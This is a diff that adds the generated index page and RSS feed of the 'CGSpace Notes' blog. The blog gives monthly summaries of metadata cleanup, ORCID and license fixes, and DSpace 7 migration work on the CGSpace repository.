#adb5bd;page-break-inside:avoid}img,tr{page-break-inside:avoid}h2,h3,p{orphans:3;widows:3}h2,h3{page-break-after:avoid}@page{size:a3}body{min-width:992px!important}.container{min-width:992px!important}.navbar{display:none}.badge{border:1px solid #000}.table{border-collapse:collapse!important}.table td,.table th{background-color:#fff!important}.table-bordered td,.table-bordered th{border:1px solid #dee2e6!important}.table-dark{color:inherit}.table-dark tbody+tbody,.table-dark td,.table-dark th,.table-dark thead th{border-color:#dee2e6}.table .thead-dark th{color:inherit;border-color:#dee2e6}}@media (min-width:48em){html{font-size:18px}}body{color:#555}.h1,.h2,.h3,.h4,.h5,.h6,h1,h2,h3,h4,h5,h6{font-weight:400;color:#333}.h1 a,.h1 a:focus,.h1 a:hover,.h2 a,.h2 a:focus,.h2 a:hover,.h3 a,.h3 a:focus,.h3 a:hover,.h4 a,.h4 a:focus,.h4 a:hover,.h5 a,.h5 a:focus,.h5 a:hover,.h6 a,.h6 a:focus,.h6 a:hover,h1 a,h1 a:focus,h1 a:hover,h2 a,h2 a:focus,h2 a:hover,h3 a,h3 a:focus,h3 a:hover,h4 a,h4 a:focus,h4 a:hover,h5 a,h5 a:focus,h5 a:hover,h6 a,h6 a:focus,h6 a:hover{color:inherit;text-decoration:none}.container{max-width:60rem}.blog-masthead{margin-bottom:3rem;background-color:#428bca;-webkit-box-shadow:inset 0 -.1rem .25rem rgba(0,0,0,.1);box-shadow:inset 0 -.1rem .25rem rgba(0,0,0,.1)}.nav-link{position:relative;padding:1rem;font-weight:500;color:#cdddeb}.nav-link:focus,.nav-link:hover{color:#fff;background-color:transparent}.nav-link.active{color:#fff}.nav-link.active:after{position:absolute;bottom:0;left:50%;width:0;height:0;margin-left:-.3rem;vertical-align:middle;content:"";border-right:.3rem solid transparent;border-bottom:.3rem solid;border-left:.3rem solid transparent}.blog-header{padding-bottom:1.25rem;margin-bottom:2rem;border-bottom:.05rem solid #eee}.blog-title{margin-bottom:0;font-size:2rem;font-weight:400}.blog-description{font-size:1.1rem;color:#999}@media (min-width:40em){.blog-title{font-size:3.5rem}}.sidebar-module{padding:1rem}.sidebar-module-inset{padding:1rem;background-color:#f5f5f5;border-radius:.25rem}.sidebar-module-inset ol:last-child,.sidebar-module-inset p:last-child,.sidebar-module-inset ul:last-child{margin-bottom:0}.blog-pagination{margin-bottom:4rem}.blog-pagination>.btn{border-radius:2rem}.blog-post{margin-bottom:4rem}.blog-post-title{margin-bottom:.25rem;font-size:2.5rem}.blog-post-meta{margin-bottom:1.25rem;color:#999}article img{max-width:100%;height:auto;margin:13px auto}.sharing-icons .nav-item+.nav-item{margin-left:1rem}section+#disqus_thread{margin-top:1rem}article blockquote{margin-bottom:1rem;font-size:1.25rem}article div.highlight{padding:5px 5px 0 5px}.blog-footer{padding:2.5rem 0;color:#999;text-align:center;background-color:#f9f9f9;border-top:.05rem solid #e5e5e5}.blog-footer p:last-child{margin-bottom:0}
\ No newline at end of file
diff --git a/docs/index.html b/docs/index.html
new file mode 100644
index 000000000..eb8e1d5ac
--- /dev/null
+++ b/docs/index.html
@@ -0,0 +1,440 @@
+<!DOCTYPE html>
+<html lang="en" >
+
+  <head>
+    <meta charset="utf-8">
+<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
+
+
+<meta property="og:title" content="CGSpace Notes" />
+<meta property="og:description" content="Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository." />
+<meta property="og:type" content="website" />
+<meta property="og:url" content="https://alanorth.github.io/cgspace-notes/" />
+<meta property="og:updated_time" content="2023-07-01T17:17:31+03:00" />
+
+
+
+<meta name="twitter:card" content="summary"/>
+<meta name="twitter:title" content="CGSpace Notes"/>
+<meta name="twitter:description" content="Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository."/>
+<meta name="generator" content="Hugo 0.112.3">
+
+
+    
+<script type="application/ld+json">
+{
+  "@context": "http://schema.org",
+  "@type": "Blog",
+  "headline": "CGSpace Notes",
+  "url" : "https://alanorth.github.io/cgspace-notes/",
+  "author": {
+    "@type": "Person",
+    "name": "Alan Orth"
+  },
+  "dateModified": "2023-07-01T17:14:36+03:00",
+  "keywords": "notes, migration, notes",
+  "description":"Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository."
+}
+</script>
+
+
+    <link rel="canonical" href="https://alanorth.github.io/cgspace-notes/">
+
+    <title>CGSpace Notes</title>
+
+    
+    <!-- combined, minified CSS -->
+    
+    <link href="https://alanorth.github.io/cgspace-notes/css/style.c6ba80bc50669557645abe05f86b73cc5af84408ed20f1551a267bc19ece8228.css" rel="stylesheet" integrity="sha256-xrqAvFBmlVdkWr4F&#43;GtzzFr4RAjtIPFVGiZ7wZ7Ogig=" crossorigin="anonymous">
+    
+
+    <!-- minified Font Awesome for SVG icons -->
+    
+    <script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.f5072c55a0721857184db93a50561d7dc13975b4de2e19db7f81eb5f3fa57270.js" integrity="sha256-9QcsVaByGFcYTbk6UFYdfcE5dbTeLhnbf4HrXz&#43;lcnA=" crossorigin="anonymous"></script>
+
+    <!-- RSS 2.0 feed -->
+    <link rel="alternate" type="application/rss+xml" href="https://alanorth.github.io/cgspace-notes/index.xml" title="CGSpace Notes" />
+    
+
+    
+
+  </head>
+
+  <body>
+
+    
+    <div class="blog-masthead">
+      <div class="container">
+        <nav class="nav blog-nav">
+          <a class="nav-link active" href="https://alanorth.github.io/cgspace-notes/">Home</a>
+        </nav>
+      </div>
+    </div>
+    
+
+    
+    
+    <header class="blog-header">
+      <div class="container">
+        <h1 class="blog-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/" rel="home">CGSpace Notes</a></h1>
+        <p class="lead blog-description" dir="auto">Documenting day-to-day work on the <a href="https://cgspace.cgiar.org">CGSpace</a> repository.</p>
+      </div>
+    </header>
+    
+    
+
+    
+    <div class="container">
+      <div class="row">
+        <div class="col-sm-8 blog-main">
+
+          
+
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2023-07/">July, 2023</a></h2>
+    <p class="blog-post-meta"><time datetime="2023-07-01T17:14:36+03:00">Sat Jul 01, 2023</time> by Alan Orth in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  2023-07-01 Export CGSpace to check for missing Initiative collection mappings Start harvesting on AReS 2023-07-02 Minor edits to the crossref_doi_lookup.py script while running some checks from 22,000 CGSpace DOIs 2023-07-03 I analyzed the licenses declared by Crossref and found with high confidence that ~400 of ours were incorrect I took the more accurate ones from Crossref and updated the items on CGSpace I took a few hundred ISBNs as well for where we were missing them I also tagged ~4,700 items with missing licenses as &ldquo;Copyrighted; all rights reserved&rdquo; based on their Crossref license status being TDM, mostly from Elsevier, Wiley, and Springer Checking a dozen or so manually, I confirmed that if Crossref only has a TDM license then it&rsquo;s usually copyrighted (could still be open access, but we can&rsquo;t tell via Crossref) I would be curious to write a script to check the Unpaywall API for open access status&hellip; In the past I found that their license status was not very accurate, but the open access status might be more reliable More minor work on the DSpace 7 item views I learned some new Angular template syntax I created a custom component to show Creative Commons licenses on the simple item page I also decided that I don&rsquo;t like the Impact Area icons as a component because they don&rsquo;t have any visual meaning 
+  <a href='https://alanorth.github.io/cgspace-notes/2023-07/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2023-06/">June, 2023</a></h2>
+    <p class="blog-post-meta"><time datetime="2023-06-02T10:29:36+03:00">Fri Jun 02, 2023</time> by Alan Orth in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2023-06-02">2023-06-02</h2>
+<ul>
+<li>Spend some time testing my <code>post_bitstreams.py</code> script to update thumbnails for items on CGSpace
+<ul>
+<li>Interestingly I found an item with a JFIF thumbnail and another with a WebP thumbnail&hellip;</li>
+</ul>
+</li>
+<li>Meeting with Valentina, Stefano, and Sara about MODS metadata in CGSpace
+<ul>
+<li>They have experience with improving the MODS interface in MELSpace&rsquo;s OAI-PMH for use with AGRIS and were curious if we could do the same in CGSpace</li>
+<li>From what I can see we need to upgrade the MODS schema from 3.1 to 3.7 and then just add a bunch of our fields to the crosswalk</li>
+</ul>
+</li>
+</ul>
+  <a href='https://alanorth.github.io/cgspace-notes/2023-06/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2023-05/">May, 2023</a></h2>
+    <p class="blog-post-meta"><time datetime="2023-05-03T08:53:36+03:00">Wed May 03, 2023</time> by Alan Orth in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2023-05-03">2023-05-03</h2>
+<ul>
+<li>Alliance&rsquo;s TIP team emailed me to ask about issues authenticating on CGSpace
+<ul>
+<li>It seems their password expired, which is annoying</li>
+</ul>
+</li>
+<li>I continued looking at the CGSpace subjects for the FAO / AGROVOC exercise that I started last week
+<ul>
+<li>There are many of our subjects that would match if they added a &ldquo;-&rdquo; like &ldquo;high yielding varieties&rdquo; or used singular&hellip;</li>
+<li>Also I found at least two spelling mistakes, for example &ldquo;decison support systems&rdquo;, which would match if it was spelled correctly</li>
+</ul>
+</li>
+<li>Work on cleaning, proofing, and uploading twenty-seven records for IFPRI to CGSpace</li>
+</ul>
+  <a href='https://alanorth.github.io/cgspace-notes/2023-05/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2023-04/">April, 2023</a></h2>
+    <p class="blog-post-meta"><time datetime="2023-04-02T08:19:36+03:00">Sun Apr 02, 2023</time> by Alan Orth in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2023-04-02">2023-04-02</h2>
+<ul>
+<li>Run all system updates on CGSpace and reboot it</li>
+<li>I exported CGSpace to CSV to check for any missing Initiative collection mappings
+<ul>
+<li>I also did a check for missing country/region mappings with csv-metadata-quality</li>
+</ul>
+</li>
+<li>Start a harvest on AReS</li>
+</ul>
+  <a href='https://alanorth.github.io/cgspace-notes/2023-04/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2023-03/">March, 2023</a></h2>
+    <p class="blog-post-meta"><time datetime="2023-03-01T07:58:36+03:00">Wed Mar 01, 2023</time> by Alan Orth in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2023-03-01">2023-03-01</h2>
+<ul>
+<li>Remove <code>cg.subject.wle</code> and <code>cg.identifier.wletheme</code> from CGSpace input form after confirming with IWMI colleagues that they no longer need them (WLE closed in 2021)</li>
+<li><a href="https://salsa.debian.org/iso-codes-team/iso-codes/-/blob/main/CHANGELOG.md#4130-2023-02-28">iso-codes 4.13.0 was released</a>, which incorporates my changes to the common names for Iran, Laos, and Syria</li>
+<li>I finally got through with porting the input form from DSpace 6 to DSpace 7</li>
+</ul>
+  <a href='https://alanorth.github.io/cgspace-notes/2023-03/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2023-02/">February, 2023</a></h2>
+    <p class="blog-post-meta"><time datetime="2023-02-01T10:57:36+03:00">Wed Feb 01, 2023</time> by Alan Orth in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2023-02-01">2023-02-01</h2>
+<ul>
+<li>Export CGSpace to cross check the DOI metadata with Crossref
+<ul>
+<li>I want to try to expand my use of their data to journals, publishers, volumes, issues, etc&hellip;</li>
+</ul>
+</li>
+</ul>
+  <a href='https://alanorth.github.io/cgspace-notes/2023-02/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2023-01/">January, 2023</a></h2>
+    <p class="blog-post-meta"><time datetime="2023-01-01T08:44:36+03:00">Sun Jan 01, 2023</time> by Alan Orth in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2023-01-01">2023-01-01</h2>
+<ul>
+<li>Apply some more ORCID identifiers to items on CGSpace using my <code>2022-09-22-add-orcids.csv</code> file
+<ul>
+<li>I want to update all ORCID names and refresh them in the database</li>
+<li>I see we have some new ones that aren&rsquo;t in our list if I combine with this file:</li>
+</ul>
+</li>
+</ul>
+  <a href='https://alanorth.github.io/cgspace-notes/2023-01/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2022-12/">December, 2022</a></h2>
+    <p class="blog-post-meta"><time datetime="2022-12-01T08:52:36+03:00">Thu Dec 01, 2022</time> by Alan Orth in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2022-12-01">2022-12-01</h2>
+<ul>
+<li>Fix some incorrect regions on CGSpace
+<ul>
+<li>I exported the CCAFS and IITA communities, extracted just the country and region columns, then ran them through csv-metadata-quality to fix the regions</li>
+</ul>
+</li>
+<li>Add a few more authors to my CSV with author names and ORCID identifiers and tag 283 items!</li>
+<li>Replace &ldquo;East Asia&rdquo; with &ldquo;Eastern Asia&rdquo; region on CGSpace (UN M.49 region)</li>
+</ul>
+  <a href='https://alanorth.github.io/cgspace-notes/2022-12/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2022-11/">November, 2022</a></h2>
+    <p class="blog-post-meta"><time datetime="2022-11-01T09:11:36+03:00">Tue Nov 01, 2022</time> by Alan Orth in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2022-11-01">2022-11-01</h2>
+<ul>
+<li>Last night I re-synced DSpace 7 Test from CGSpace
+<ul>
+<li>I also updated all my local <code>7_x-dev</code> branches on the latest upstreams</li>
+</ul>
+</li>
+<li>I spent some time updating the authorizations in Alliance collections
+<ul>
+<li>I want to make sure they use groups instead of individuals where possible!</li>
+</ul>
+</li>
+<li>I reverted the Cocoon autosave change because it was more of a nuissance that Peter can&rsquo;t upload CSVs from the web interface and is a very low severity security issue</li>
+</ul>
+  <a href='https://alanorth.github.io/cgspace-notes/2022-11/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2022-10/">October, 2022</a></h2>
+    <p class="blog-post-meta"><time datetime="2022-10-01T19:45:36+03:00">Sat Oct 01, 2022</time> by Alan Orth in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2022-10-01">2022-10-01</h2>
+<ul>
+<li>Start a harvest on AReS last night</li>
+<li>Yesterday I realized how to use <a href="https://im4java.sourceforge.net/docs/dev-guide.html">GraphicsMagick with im4java</a> and I want to re-visit some of my thumbnail tests
+<ul>
+<li>I&rsquo;m also interested in libvips support via jVips, though last time I checked it was only for Java 8</li>
+<li>I filed <a href="https://github.com/criteo/JVips/issues/141">an issue to ask about Java 11+ support</a></li>
+</ul>
+</li>
+</ul>
+  <a href='https://alanorth.github.io/cgspace-notes/2022-10/'>Read more →</a>
+</article> 
+
+
+
+
+
+<nav class="blog-pagination">
+  
+  
+  
+  <a class="btn btn-outline-primary disabled" href="#" role="button" aria-disabled="true">Previous page</a>
+  <a class="btn btn-outline-primary" href="/cgspace-notes/page/2/" rel="next" role="button">Next page</a>
+  
+</nav>
+
+
+
+
+
+        </div> <!-- /.blog-main -->
+
+        <aside class="col-sm-3 ml-auto blog-sidebar">
+  
+
+  
+        <section class="sidebar-module">
+    <h4>Recent Posts</h4>
+    <ol class="list-unstyled">
+
+
+<li><a href="/cgspace-notes/2023-07/">July, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-06/">June, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-05/">May, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-04/">April, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-03/">March, 2023</a></li>
+
+    </ol>
+  </section>
+
+  
+
+  
+  <section class="sidebar-module">
+    <h4>Links</h4>
+    <ol class="list-unstyled">
+      
+      <li><a href="https://cgspace.cgiar.org">CGSpace</a></li>
+      
+      <li><a href="https://dspacetest.cgiar.org">DSpace Test</a></li>
+      
+      <li><a href="https://github.com/ilri/DSpace">CGSpace @ GitHub</a></li>
+      
+    </ol>
+  </section>
+  
+</aside>
+
+
+      </div> <!-- /.row -->
+    </div> <!-- /.container -->
+    
+
+    
+    <footer class="blog-footer">
+      <p dir="auto">
+      
+      Blog template created by <a href="https://twitter.com/mdo">@mdo</a>, ported to Hugo by <a href='https://twitter.com/mralanorth'>@mralanorth</a>.
+      
+      </p>
+      <p>
+      <a href="#">Back to top</a>
+      </p>
+    </footer>
+    
+
+  </body>
+
+</html>
diff --git a/docs/index.xml b/docs/index.xml
new file mode 100644
index 000000000..5258126b3
--- /dev/null
+++ b/docs/index.xml
@@ -0,0 +1,1907 @@
+<?xml version="1.0" encoding="utf-8" standalone="yes"?>
+<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom">
+  <channel>
+    <title>CGSpace Notes</title>
+    <link>https://alanorth.github.io/cgspace-notes/</link>
+    <description>Recent content on CGSpace Notes</description>
+    <generator>Hugo -- gohugo.io</generator>
+    <language>en-us</language>
+    <lastBuildDate>Sat, 01 Jul 2023 17:14:36 +0300</lastBuildDate><atom:link href="https://alanorth.github.io/cgspace-notes/index.xml" rel="self" type="application/rss+xml" />
+    <item>
+      <title>July, 2023</title>
+      <link>https://alanorth.github.io/cgspace-notes/2023-07/</link>
+      <pubDate>Sat, 01 Jul 2023 17:14:36 +0300</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2023-07/</guid>
+      <description>2023-07-01 Export CGSpace to check for missing Initiative collection mappings Start harvesting on AReS 2023-07-02 Minor edits to the crossref_doi_lookup.py script while running some checks from 22,000 CGSpace DOIs 2023-07-03 I analyzed the licenses declared by Crossref and found with high confidence that ~400 of ours were incorrect I took the more accurate ones from Crossref and updated the items on CGSpace I took a few hundred ISBNs as well for where we were missing them I also tagged ~4,700 items with missing licenses as &amp;ldquo;Copyrighted; all rights reserved&amp;rdquo; based on their Crossref license status being TDM, mostly from Elsevier, Wiley, and Springer Checking a dozen or so manually, I confirmed that if Crossref only has a TDM license then it&amp;rsquo;s usually copyrighted (could still be open access, but we can&amp;rsquo;t tell via Crossref) I would be curious to write a script to check the Unpaywall API for open access status&amp;hellip; In the past I found that their license status was not very accurate, but the open access status might be more reliable More minor work on the DSpace 7 item views I learned some new Angular template syntax I created a custom component to show Creative Commons licenses on the simple item page I also decided that I don&amp;rsquo;t like the Impact Area icons as a component because they don&amp;rsquo;t have any visual meaning </description>
+    </item>
+    
+    <item>
+      <title>June, 2023</title>
+      <link>https://alanorth.github.io/cgspace-notes/2023-06/</link>
+      <pubDate>Fri, 02 Jun 2023 10:29:36 +0300</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2023-06/</guid>
+      <description>&lt;h2 id=&#34;2023-06-02&#34;&gt;2023-06-02&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;Spend some time testing my &lt;code&gt;post_bitstreams.py&lt;/code&gt; script to update thumbnails for items on CGSpace
+&lt;ul&gt;
+&lt;li&gt;Interestingly I found an item with a JFIF thumbnail and another with a WebP thumbnail&amp;hellip;&lt;/li&gt;
+&lt;/ul&gt;
+&lt;/li&gt;
+&lt;li&gt;Meeting with Valentina, Stefano, and Sara about MODS metadata in CGSpace
+&lt;ul&gt;
+&lt;li&gt;They have experience with improving the MODS interface in MELSpace&amp;rsquo;s OAI-PMH for use with AGRIS and were curious if we could do the same in CGSpace&lt;/li&gt;
+&lt;li&gt;From what I can see we need to upgrade the MODS schema from 3.1 to 3.7 and then just add a bunch of our fields to the crosswalk&lt;/li&gt;
+&lt;/ul&gt;
+&lt;/li&gt;
+&lt;/ul&gt;</description>
+    </item>
+    
+    <item>
+      <title>May, 2023</title>
+      <link>https://alanorth.github.io/cgspace-notes/2023-05/</link>
+      <pubDate>Wed, 03 May 2023 08:53:36 +0300</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2023-05/</guid>
+      <description>&lt;h2 id=&#34;2023-05-03&#34;&gt;2023-05-03&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;Alliance&amp;rsquo;s TIP team emailed me to ask about issues authenticating on CGSpace
+&lt;ul&gt;
+&lt;li&gt;It seems their password expired, which is annoying&lt;/li&gt;
+&lt;/ul&gt;
+&lt;/li&gt;
+&lt;li&gt;I continued looking at the CGSpace subjects for the FAO / AGROVOC exercise that I started last week
+&lt;ul&gt;
+&lt;li&gt;There are many of our subjects that would match if they added a &amp;ldquo;-&amp;rdquo; like &amp;ldquo;high yielding varieties&amp;rdquo; or used singular&amp;hellip;&lt;/li&gt;
+&lt;li&gt;Also I found at least two spelling mistakes, for example &amp;ldquo;decison support systems&amp;rdquo;, which would match if it was spelled correctly&lt;/li&gt;
+&lt;/ul&gt;
+&lt;/li&gt;
+&lt;li&gt;Work on cleaning, proofing, and uploading twenty-seven records for IFPRI to CGSpace&lt;/li&gt;
+&lt;/ul&gt;</description>
+    </item>
+    
+    <item>
+      <title>April, 2023</title>
+      <link>https://alanorth.github.io/cgspace-notes/2023-04/</link>
+      <pubDate>Sun, 02 Apr 2023 08:19:36 +0300</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2023-04/</guid>
+      <description>&lt;h2 id=&#34;2023-04-02&#34;&gt;2023-04-02&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;Run all system updates on CGSpace and reboot it&lt;/li&gt;
+&lt;li&gt;I exported CGSpace to CSV to check for any missing Initiative collection mappings
+&lt;ul&gt;
+&lt;li&gt;I also did a check for missing country/region mappings with csv-metadata-quality&lt;/li&gt;
+&lt;/ul&gt;
+&lt;/li&gt;
+&lt;li&gt;Start a harvest on AReS&lt;/li&gt;
+&lt;/ul&gt;</description>
+    </item>
+    
+    <item>
+      <title>March, 2023</title>
+      <link>https://alanorth.github.io/cgspace-notes/2023-03/</link>
+      <pubDate>Wed, 01 Mar 2023 07:58:36 +0300</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2023-03/</guid>
+      <description>&lt;h2 id=&#34;2023-03-01&#34;&gt;2023-03-01&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;Remove &lt;code&gt;cg.subject.wle&lt;/code&gt; and &lt;code&gt;cg.identifier.wletheme&lt;/code&gt; from CGSpace input form after confirming with IWMI colleagues that they no longer need them (WLE closed in 2021)&lt;/li&gt;
+&lt;li&gt;&lt;a href=&#34;https://salsa.debian.org/iso-codes-team/iso-codes/-/blob/main/CHANGELOG.md#4130-2023-02-28&#34;&gt;iso-codes 4.13.0 was released&lt;/a&gt;, which incorporates my changes to the common names for Iran, Laos, and Syria&lt;/li&gt;
+&lt;li&gt;I finally got through with porting the input form from DSpace 6 to DSpace 7&lt;/li&gt;
+&lt;/ul&gt;</description>
+    </item>
+    
+    <item>
+      <title>February, 2023</title>
+      <link>https://alanorth.github.io/cgspace-notes/2023-02/</link>
+      <pubDate>Wed, 01 Feb 2023 10:57:36 +0300</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2023-02/</guid>
+      <description>&lt;h2 id=&#34;2023-02-01&#34;&gt;2023-02-01&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;Export CGSpace to cross check the DOI metadata with Crossref
+&lt;ul&gt;
+&lt;li&gt;I want to try to expand my use of their data to journals, publishers, volumes, issues, etc&amp;hellip;&lt;/li&gt;
+&lt;/ul&gt;
+&lt;/li&gt;
+&lt;/ul&gt;</description>
+    </item>
+    
+    <item>
+      <title>January, 2023</title>
+      <link>https://alanorth.github.io/cgspace-notes/2023-01/</link>
+      <pubDate>Sun, 01 Jan 2023 08:44:36 +0300</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2023-01/</guid>
+      <description>&lt;h2 id=&#34;2023-01-01&#34;&gt;2023-01-01&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;Apply some more ORCID identifiers to items on CGSpace using my &lt;code&gt;2022-09-22-add-orcids.csv&lt;/code&gt; file
+&lt;ul&gt;
+&lt;li&gt;I want to update all ORCID names and refresh them in the database&lt;/li&gt;
+&lt;li&gt;I see we have some new ones that aren&amp;rsquo;t in our list if I combine with this file:&lt;/li&gt;
+&lt;/ul&gt;
+&lt;/li&gt;
+&lt;/ul&gt;</description>
+    </item>
+    
+    <item>
+      <title>December, 2022</title>
+      <link>https://alanorth.github.io/cgspace-notes/2022-12/</link>
+      <pubDate>Thu, 01 Dec 2022 08:52:36 +0300</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2022-12/</guid>
+      <description>&lt;h2 id=&#34;2022-12-01&#34;&gt;2022-12-01&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;Fix some incorrect regions on CGSpace
+&lt;ul&gt;
+&lt;li&gt;I exported the CCAFS and IITA communities, extracted just the country and region columns, then ran them through csv-metadata-quality to fix the regions&lt;/li&gt;
+&lt;/ul&gt;
+&lt;/li&gt;
+&lt;li&gt;Add a few more authors to my CSV with author names and ORCID identifiers and tag 283 items!&lt;/li&gt;
+&lt;li&gt;Replace &amp;ldquo;East Asia&amp;rdquo; with &amp;ldquo;Eastern Asia&amp;rdquo; region on CGSpace (UN M.49 region)&lt;/li&gt;
+&lt;/ul&gt;</description>
+    </item>
+    
+    <item>
+      <title>November, 2022</title>
+      <link>https://alanorth.github.io/cgspace-notes/2022-11/</link>
+      <pubDate>Tue, 01 Nov 2022 09:11:36 +0300</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2022-11/</guid>
+      <description>&lt;h2 id=&#34;2022-11-01&#34;&gt;2022-11-01&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;Last night I re-synced DSpace 7 Test from CGSpace
+&lt;ul&gt;
+&lt;li&gt;I also updated all my local &lt;code&gt;7_x-dev&lt;/code&gt; branches on the latest upstreams&lt;/li&gt;
+&lt;/ul&gt;
+&lt;/li&gt;
+&lt;li&gt;I spent some time updating the authorizations in Alliance collections
+&lt;ul&gt;
+&lt;li&gt;I want to make sure they use groups instead of individuals where possible!&lt;/li&gt;
+&lt;/ul&gt;
+&lt;/li&gt;
+&lt;li&gt;I reverted the Cocoon autosave change because it was more of a nuissance that Peter can&amp;rsquo;t upload CSVs from the web interface and is a very low severity security issue&lt;/li&gt;
+&lt;/ul&gt;</description>
+    </item>
+    
+    <item>
+      <title>October, 2022</title>
+      <link>https://alanorth.github.io/cgspace-notes/2022-10/</link>
+      <pubDate>Sat, 01 Oct 2022 19:45:36 +0300</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2022-10/</guid>
+      <description>&lt;h2 id=&#34;2022-10-01&#34;&gt;2022-10-01&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;Start a harvest on AReS last night&lt;/li&gt;
+&lt;li&gt;Yesterday I realized how to use &lt;a href=&#34;https://im4java.sourceforge.net/docs/dev-guide.html&#34;&gt;GraphicsMagick with im4java&lt;/a&gt; and I want to re-visit some of my thumbnail tests
+&lt;ul&gt;
+&lt;li&gt;I&amp;rsquo;m also interested in libvips support via jVips, though last time I checked it was only for Java 8&lt;/li&gt;
+&lt;li&gt;I filed &lt;a href=&#34;https://github.com/criteo/JVips/issues/141&#34;&gt;an issue to ask about Java 11+ support&lt;/a&gt;&lt;/li&gt;
+&lt;/ul&gt;
+&lt;/li&gt;
+&lt;/ul&gt;</description>
+    </item>
+    
+    <item>
+      <title>September, 2022</title>
+      <link>https://alanorth.github.io/cgspace-notes/2022-09/</link>
+      <pubDate>Thu, 01 Sep 2022 09:41:36 +0300</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2022-09/</guid>
+      <description>&lt;h2 id=&#34;2022-09-01&#34;&gt;2022-09-01&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;A bit of work on the &amp;ldquo;Mapping CG Core–CGSpace–MEL–MARLO Types&amp;rdquo; spreadsheet&lt;/li&gt;
+&lt;li&gt;I tested an item submission on DSpace Test with the Cocoon &lt;code&gt;org.apache.cocoon.uploads.autosave=false&lt;/code&gt; change
+&lt;ul&gt;
